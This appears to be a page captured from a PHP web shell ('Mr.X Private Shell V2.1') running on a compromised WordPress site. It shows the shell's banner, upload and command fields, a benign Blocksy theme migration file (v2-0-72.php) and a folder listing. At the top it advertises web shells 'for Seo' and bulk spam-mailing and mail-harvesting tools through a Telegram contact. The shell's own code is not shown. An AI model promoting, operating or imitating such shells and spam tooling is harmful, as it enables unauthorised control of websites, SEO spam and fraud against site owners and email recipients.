__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

namespace Blocksy\DbVersioning;

class V2072 {
	public function migrate() {
		$cleaner = new DefaultValuesCleaner();
		$cleaner->clean_whole_customizer_recursively();

		$default_enabled = [
			'facebook',
			'twitter',
			'pinterest',
			'linkedin',
		];

		$old_share_options = [
			'reddit',
			'hacker_news',
			'vk',
			'ok',
			'telegram',
			'viber',
			'whatsapp',
			'flipboard',
			'line',
			'threads',
			'email',
			'clipboard',
		];

		$old_share_options = array_merge($default_enabled, $old_share_options);

		$default_value_for_new_option = [];

		foreach ($default_enabled as $option) {
			$default_value_for_new_option[] = [
				'id' => $option,
				'enabled' => true
			];
		}

		$prefixes = [];

		foreach (blocksy_manager()->screen->get_single_prefixes() as $prefix) {
			$prefixes[] = $prefix;
		}

		foreach ($prefixes as $prefix) {
			$new_option_value = [];

			foreach ($old_share_options as $old_share_option) {
				$option_key = $prefix . '_share_' . $old_share_option;

				$old_value = get_theme_mod($option_key, '__empty__');

				if ($old_value === '__empty__') {
					if (in_array($old_share_option, $default_enabled)) {
						$new_option_value[] = [
							'id' => $old_share_option,
							'enabled' => true
						];
					}

					continue;
				}

				remove_theme_mod($option_key);

				if ($old_value === 'no') {
					continue;
				}

				$new_option_value[] = [
					'id' => $old_share_option,
					'enabled' => true
				];
			}

			if ($new_option_value != $default_value_for_new_option) {
				set_theme_mod(
					$prefix . '_' . 'share_networks',
					$new_option_value
				);
			}
		}
	}

	public function migrate_compare_table_layers() {
		$old_render_layout_config = blocksy_get_theme_mod('product_compare_layout', [
			[
				'id' => 'product_main',
				'enabled' => true,
			],
			[
				'id' => 'product_description',
				'enabled' => true,
			],
			[
				'id' => 'product_attributes',
				'enabled' => true,
				'product_attributes_source' => 'all',
			],
			[
				'id' => 'product_availability',
				'enabled' => true,
			],
		]);

		$missing_rows = [
			[
				'id' => 'product_price',
				'enabled' => true,
			],
			[
				'id' => 'product_add_to_cart',
				'enabled' => true,
			],
		];

		$index_of_product_price = array_search(
			'product_price',
			array_column($old_render_layout_config, 'id')
		);

		$index_of_product_add_to_cart = array_search(
			'product_add_to_cart',
			array_column($old_render_layout_config, 'id')
		);

		if (
			$index_of_product_price !== false
			||
			$index_of_product_add_to_cart !== false
		) {
			return;
		}

		$index_of_product_main = array_search(
			'product_main',
			array_column($old_render_layout_config, 'id')
		);

		if ($index_of_product_main !== false) {
			array_splice(
				$old_render_layout_config,
				$index_of_product_main + 1,
				0,
				$missing_rows
			);
		}

		set_theme_mod('product_compare_layout', $old_render_layout_config);
	}
}

Filemanager

Name Type Size Permission Actions
utils Folder 0750
v2-0-0.php File 12.28 KB 0640
v2-0-15.php File 1.19 KB 0640
v2-0-19.php File 1.13 KB 0640
v2-0-2.php File 1.24 KB 0640
v2-0-26.php File 230 B 0640
v2-0-27.php File 205 B 0640
v2-0-3.php File 759 B 0640
v2-0-31.php File 3.46 KB 0640
v2-0-34.php File 778 B 0640
v2-0-36.php File 1.28 KB 0640
v2-0-38.php File 1.35 KB 0640
v2-0-53.php File 632 B 0640
v2-0-60.php File 338 B 0640
v2-0-67.php File 698 B 0640
v2-0-70.php File 179 B 0640
v2-0-72.php File 2.88 KB 0640
v2-0-73.php File 1.2 KB 0640
v2-0-74.php File 347 B 0640
v2-0-75.php File 458 B 0640
v2-0-76.php File 2.21 KB 0640
v2-0-87.php File 2.29 KB 0640
v2-0-9.php File 2.19 KB 0640
v2-0-92.php File 2.38 KB 0640
v2-0-93.php File 745 B 0640
v2-0-94.php File 1005 B 0640
v2-0-96.php File 2.61 KB 0640
v2-1-0.php File 1.41 KB 0640
v2-1-1.php File 1.3 KB 0640
Filemanager